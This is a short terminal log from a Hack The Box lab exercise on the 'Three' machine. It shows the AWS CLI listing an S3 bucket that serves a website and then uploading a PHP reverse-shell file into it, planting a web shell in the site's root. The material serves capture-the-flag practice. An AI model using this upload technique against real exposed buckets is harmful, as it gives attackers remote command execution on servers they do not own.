┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier1/Three]
└─$ aws s3 --endpoint-url=http://s3.thetoppers.htb --color=on  ls  
2023-03-14 20:10:38 thetoppers.htb
┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier1/Three]
└─$ aws s3 --endpoint-url=http://s3.thetoppers.htb --color=on  ls s3://thetoppers.htb   
                           PRE images/
2023-03-14 20:10:38          0 .htaccess
2023-03-14 20:10:38      11952 index.php
┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier1/Three]
└─$ aws s3 --endpoint-url=http://s3.thetoppers.htb --color=on  cp php-reverse-shell.php s3://thetoppers.htb   
upload: ./php-reverse-shell.php to s3://thetoppers.htb/php-reverse-shell.php
┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier1/Three]
└─$ aws s3 --endpoint-url=http://s3.thetoppers.htb --color=on  ls s3://thetoppers.htb
                           PRE images/
2023-03-14 20:10:38          0 .htaccess
2023-03-14 20:10:38      11952 index.php
2023-03-14 23:33:15       2584 php-reverse-shell.php